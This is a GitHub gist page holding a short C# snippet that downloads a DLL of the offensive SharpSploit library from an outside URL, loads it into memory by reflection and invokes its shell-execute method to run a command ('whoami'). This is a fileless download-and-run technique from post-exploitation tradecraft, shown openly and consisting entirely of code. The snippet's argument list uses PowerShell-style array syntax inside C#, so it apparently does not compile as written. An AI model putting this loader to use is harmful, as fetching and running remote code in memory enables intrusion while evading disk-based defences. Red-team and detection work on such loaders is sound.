Skip to content

Instantly share code, notes, and snippets.

@cobbr
Created November 6, 2018 15:48
Show Gist options
  • Save cobbr/12569422728382ba9fbb0a902aa503db to your computer and use it in GitHub Desktop.
Save cobbr/12569422728382ba9fbb0a902aa503db to your computer and use it in GitHub Desktop.
public class Program {
public static void Main() {
System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData("https://example.com/SharpSploit.dll")).GetType("SharpSploit.Execution.Shell").GetMethod("ShellExecute").Invoke(0, @("whoami", "", "", ""));
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment